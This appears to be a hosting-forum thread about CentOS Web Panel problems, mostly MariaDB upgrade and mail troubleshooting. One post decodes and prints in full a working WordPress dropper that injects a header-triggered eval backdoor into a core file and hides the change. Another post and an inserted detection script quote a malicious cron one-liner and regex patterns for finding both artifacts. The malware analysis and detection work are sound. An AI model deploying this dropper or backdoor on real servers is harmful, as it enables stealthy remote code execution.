  1. Yesterday
  2. This is obfuscated code in base64. Decoding this base64 sequence generates the following PHP code, which will be executed by PHP itself through the "eval" PHP function:

     ```php
     phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');

     function phpConfValidate($ser) {
         list ($fullPath, $systemEnv, $code, $pattern) = unserialize(base64_decode($ser));
         $source = file_get_contents($fullPath);
         if (preg_match($systemEnv, $source)) {
             return;
         }
         if (!preg_match($pattern, $source, $matches)) {
             return;
         }
         $incorrectRegex = str_replace('e' . 'va' . 'l', '@?arr' . 'ay', $systemEnv);
         $newSource = preg_replace($incorrectRegex, '', $source);
         $newSource = str_replace($matches[0], $code . PHP_EOL . $matches[0], $newSource);
         if (!preg_match($systemEnv, $newSource)) {
             return;
         }
         $filemtime = filemtime($fullPath) + 10;
         unlink($fullPath);
         file_put_contents($fullPath, $newSource);
         touch($fullPath, $filemtime);
     }
     ```

     Decoding the following sequence:

     ```php
     phpConfValidate('YTo0OntpOjA7czo1MDoiL2hvbWUvZm90YmFsbG5lcmQvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvbWV0YS5waHAiO2k6MTtzOjk4OiJ+ZXZhbFteXChcblxyXSpcKFteXCRdKlwkX1tBLVpdezZ9W15cW10qXFtbXlwnXCJdKltcJ1wiXUhUVFBfRDM0MUJFRFtcJ1wiXVteXF1dKlxdW15cKV0qXClbXjtdKjt+cyI7aToyO3M6MzI6IkBldmFsKCRfU0VSVkVSWydIVFRQX0QzNDFCRUQnXSk7IjtpOjM7czozMzoifl5ccypmdW5jdGlvblxzK3VwZGF0ZV9tZXRhZGF0YX5tIjt9');
     ```

     ...we get the code that will be saved and executed on your server:

     ```
     a:4:{i:0;s:50:"/home/fotballnerd/public_html/wp-includes/meta.php";i:1;s:98:"~eval[^\(\n\r]*\([^\$]*\$_[A-Z]{6}[^\[]*\[[^\'\"]*[\'\"]HTTP_D341BED[\'\"][^\]]*\][^\)]*\)[^;]*;~s";i:2;s:32:"@eval($_SERVER['HTTP_D341BED']);";i:3;s:33:"~^\s*function\s+update_metadata~m";}
     ```

     It's a sequence of obfuscated sequences of code. Does this last line make sense to you? If not, it is strongly possible your user is trying to crack your server.

     Check a discussion on this site: https://www.operationdecode.com/http-header-injection-and-modsecurity-evasion/

     The result on your server is very similar to what is shown on this site, like they said:

     > "Further analysis also indicated that this method could be used to connect to a C2 and act as a zombie host. Throughout our investigation, and in reviewing a large number of these cron and files; we can see this is a direct attack on WordPress, where the code is being injected into default WordPress files that are required for the WordPress page to load. What this allows for, is the malicious actor to send the request directly to the domain name, and not to the affected files to get the desired outcome. Furthermore, when reviewing the access logs, there is no evidence of an attack. What is visible in the logs are only the GET requests to the root of the website. This was tested on a local installation of an infected site. (...) As this method for persistence and connecting to a c2 is very stealthy, it is not easily detected and may be overlooked. A search via the command line for "@eval(http_" should help in finding if this infection exists in your WordPress installation."

     Regards, Netino
  3. Last week
  4. You can use the following command:

     ```
     opendkim-genkey -b 1024 -d yourdomain.com -D /etc/opendkim/keys/yourdomain.com -s yourselector -v
     ```

     If that doesn't work, you'll need to resort to a longer checklist, which you can check here: <https://easydmarc.com/blog/how-to-configure-dkim-opendkim-with-postfix/>

     Regards, Netino
  5. Hi everyone, I am running CWP on AlmaLinux 8 and recently ran into an email-delivery problem. When I checked /etc/opendkim/userkeys/mydomain.com, I discovered that both default.txt (DNS record) and default.private (signing key) are missing.

     What I have tried so far:

     - Used the DKIM Manager in CWP to regenerate keys.
     - Rebuilt/restarted the mailserver via CWP's control panel.

     Unfortunately, the key files never appear and the DKIM signature remains invalid. Can anyone share the exact steps or commands to regenerate the DKIM key pair (default.txt / default.private) for a domain under CWP?
  6. Some users are creating cron jobs under their username. How can I make sure that this stops? It looks like this:

     ```
     /usr/bin/php -r 'eval(gzinflate(base64_decode("…")));'
     ```
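The two artifacts described in the posts above, the `@eval($_SERVER['HTTP_...'])` line injected into a WordPress core file and the `php -r 'eval(gzinflate(base64_decode(...)))'` cron entry, can both be searched for by content. The script below is an added example, not code from any poster in this thread; the function names, the sample files and the header name `HTTP_X_CONSTRUCTED` are constructed for illustration, the header match is generalized to any `HTTP_*` name, and `/var/spool/cron` is assumed to be the crontab directory.

```shell
#!/bin/sh
# Added example (not from the thread): content-based scan for the two
# artifacts discussed above. Regexes are POSIX ERE for grep -E.

# eval() fed directly from a $_SERVER['HTTP_*'] request header (any header name).
HDR_EVAL_RE='eval[[:space:]]*\([^;]*\$_SERVER[[:space:]]*\[[[:space:]]*["'\'']HTTP_[A-Z0-9_]+'
# eval(gzinflate(base64_decode(...))) as used in the php -r cron one-liner.
CRON_EVAL_RE='eval[[:space:]]*\([[:space:]]*gzinflate[[:space:]]*\([[:space:]]*base64_decode'

scan_php_tree() {   # $1 = web root; prints file:line:text for every hit
    find "$1" -type f -name '*.php' -exec grep -nHE -- "$HDR_EVAL_RE" {} +
}

scan_cron_dir() {   # $1 = directory holding per-user crontabs
    find "$1" -type f -exec grep -nHE -- "$CRON_EVAL_RE" {} +
}

make_sample() {     # builds a constructed test tree and prints its path
    d=$(mktemp -d) || return 1
    mkdir -p "$d/www/wp-includes" "$d/cron"
    cat > "$d/www/wp-includes/meta.php" <<'EOF'
<?php
@eval($_SERVER['HTTP_X_CONSTRUCTED']);
function update_metadata($type, $id, $key, $value) {}
EOF
    cat > "$d/www/index.php" <<'EOF'
<?php $ua = $_SERVER['HTTP_USER_AGENT'];
EOF
    cat > "$d/cron/user1" <<'EOF'
*/5 * * * * /usr/bin/php -r 'eval(gzinflate(base64_decode("CONSTRUCTED")));'
0 3 * * * /usr/bin/php /home/user1/backup.php
EOF
    echo "$d"
}

# Stand-alone use: ./scan.sh /home /var/spool/cron  (paths are assumptions)
if [ "$#" -eq 2 ]; then
    scan_php_tree "$1"
    scan_cron_dir "$2"
fi
```

Because the dropper shown above resets the file's modification time to the original value plus 10 seconds, looking for recently modified files will not surface the change; matching on content does.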
  7. Earlier
  8. Recreate the user and try the upgrade again:

     ```sql
     CREATE USER `mariadb.sys`@`localhost` ACCOUNT LOCK PASSWORD EXPIRE;
     GRANT SELECT, DELETE ON `mysql`.`global_priv` TO `mariadb.sys`@`localhost`;
     ```
  9. Hi Sandeep, The upgrade went with a few hiccups but I managed to get it working. When I do mysql -V it shows me:

     ```
     mysql Ver 15.1 Distrib 10.11.11-MariaDB, for Linux (x86_64) using readline 5.1
     ```

     But after I ran the command mysql_upgrade --force and scrolled up, it gave me this:

     ```
     mysql.transaction_registry OK
     mysql.user OK
     Phase 2/8: Installing used storage engines... Skipped
     Phase 3/8: Running 'mysql_fix_privilege_tables'
     Phase 4/8: Fixing views
     mysql.user
     Warning : The user specified as a definer ('mariadb.sys'@'localhost') does not exist
     status : OK
     sys.host_summary OK
     ```

     The rest says all OK... behind. Is this an issue or? Regards, Mike
  11. Warning: failed loading '/etc/yum.repos.d/mariadb.repo', skipping.

      (This file is in the right location and has the following content:

      ```
      name = MariaDB
      baseurl = https://rpm.mariadb.org/10.11/centos/$releasever/$basearch
      module_hotfixes = 1
      gpgkey = https://rpm.mariadb.org/RPM-GPG-KEY-MariaDB
      gpgcheck = 1
      ```

      )

      This is on a brand new server than my last failed attempt at doing this. I don't know what to say, except this is not working for alma8.
  12. Probably you tried many things before, which can cause the issues. Check the logs or create a separate topic.
  13. Right now I am in a situation where I don't have a working database. Can't even log in to centos cwp.
  14. Try rpm -e --nodeps mysql-common-8.0.41-1.module_el8.10.0+3965+b415b607.x86_64
  15. The install seemed to go smoothly but got a bunch of character set errors.

      ```
      Total 66 MB/s | 155 MB 00:02
      Running transaction check
      Transaction check succeeded.
      Running transaction test
      The downloaded packages were saved in cache until the next successful transaction.
      You can remove cached packages by executing 'yum clean packages'.
      Error: Transaction test error:
        file /usr/share/mysql/charsets/Index.xml from install of MariaDB-common-10.11.11-1.el8.x86_64 conflicts with file from package mysql-common-8.0.41-1.module_el8.10.0+3965+b415b607.x86_64
      ```
  16. Making progress but getting this error, which prevents me from starting or stopping mysql:

      ```
      Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock
      ```
  17. This is not the same command; here the alpha case is sensitive.
  18. Hi, run the MySQL secure installation and remove the test db:

      ```
      mysql_secure_installation
      ```

      You may need the root password for MySQL to proceed, located in /root/.my.cnf
  19. You need to remove the mariadb server rpm:

      ```
      dnf module disable mariadb -y
      rpm -e --nodeps mariadb-server
      ```

      If you get any other conflicting package, use the same rpm remove commands and replace mariadb-server with the conflicting package name. After that, use the same procedure to update mariadb.
  20. Oops. I did not notice the error messages........

      ```
      [root@server ~]# yum install MariaDB-server MariaDB-client net-snmp perl-DBD-MySQL -y
      CentOS Web Panel repo for Linux 8 - x86_64 433 kB/s | 305 kB 00:00
      AlmaLinux 8 - BaseOS 44 MB/s | 22 MB 00:00
      AlmaLinux 8 - AppStream 44 MB/s | 17 MB 00:00
      AlmaLinux 8 - Extras 82 kB/s | 14 kB 00:00
      AlmaLinux 8 - PowerTools 19 MB/s | 4.4 MB 00:00
      AlmaLinux 8 - PowerTools Source 343 kB/s | 139 kB 00:00
      AlmaLinux 8 - PowerTools debuginfo 2.0 MB/s | 744 kB 00:00
      Extra Packages for Enterprise Linux 8 - x86_64 14 MB/s | 14 MB 00:00
      Extra Packages for Enterprise Linux Modular 8 - 1.1 MB/s | 733 kB 00:00
      MariaDB 332 kB/s | 624 kB 00:01
      Package perl-DBD-MySQL-4.046-3.module_el8.6.0+2827+49d66dc3.x86_64 is already installed.
      Error:
       Problem: problem with installed package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64
        - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed
        - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream
        - cannot install the best candidate for the job
      (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)
      [root@server ~]# yum update -y
      Last metadata expiration check: 0:00:26 ago on Thu 17 Apr 2025 04:06:19 PM UTC.
      Error:
       Problem 1: package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream
        - cannot install the best update candidate for package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64
        - cannot install the best update candidate for package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64
       Problem 2: problem with installed package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64
        - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed
        - package mariadb-gssapi-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream requires mariadb-server(x86-64) = 3:10.3.39-1.module_el8.8.0+3609+204d4ab0, but none of the providers can be installed
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from @System
        - package mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream conflicts with mysql-server provided by MariaDB-server-10.11.11-1.el8.x86_64 from mariadb
        - package MariaDB-server-10.11.11-1.el8.x86_64 from mariadb obsoletes mariadb-server provided by mariadb-server-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64 from appstream
        - cannot install the best update candidate for package mariadb-server-utils-3:10.3.39-1.module_el8.8.0+3609+204d4ab0.x86_64
      (try to add '--allowerasing' to command line to replace conflicting packages or '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)
      ```
  21. So on my new install alma8 I did exactly as you said. No errors at any point. But when I checked the version it still said 10.3. I looked on my cwp panel and noticed that the php version was 5.3. Why is cwp still installing 5.3? Anyway, I am upgrading php to 8.1 at this time and will try it again. But I don't have great expectations.

      ```
      mysql -V
      mysql Ver 15.1 Distrib 10.3.39-MariaDB, for Linux (x86_64) using readline 5.1
      ```
  22. Hi, in one of my CWP instances, any MySQL user logging into phpMyAdmin can access any database. Can you please help?
  23. Hi, try to run this API fix:

      ```
      /scripts/cwp_api account mail_fix_permissions
      ```
  24. When I log in to the webmail of any user account, I get the following errors:

      ```
      Connection to storage server failed.
      Server Error: AUTHENTICATE PLAIN: Authentication failed
      ```

      tail /var/log/dovecot.log

      ```
      Apr 12 17:39:56 imap(user@domain.tld)<7976><MQR4w5AygsJq2UlB>: Error: stat(/var/vmail/domain/user/tmp) failed: Permission denied (euid=1017(user) egid=12(mail) missing +x perm: /var/vmail/domain, dir owned by 101:12 mode=0700)
      ```
  25. This is resolved. Old repos of centos were still present after elevate upgrade.
  26. Getting the error. Looks like something messed up earlier during upgrade to almalinux 8? Please help

      ```
      CentOS-Stream - AppStream 492 B/s | 257 B 00:00
      Errors during downloading metadata for repository 'Stream-AppStream':
        - Status code: 404 for http://repo.centos-webpanel.com/8-cwp-stream/stable/AppStream/x86_64/os/repodata/repomd.xml (IP: 5.196.100.135)
      Error: Failed to download metadata for repo 'Stream-AppStream': Cannot download repomd.xml: Cannot download repodata/repomd.xml: All mirrors were tried
      ```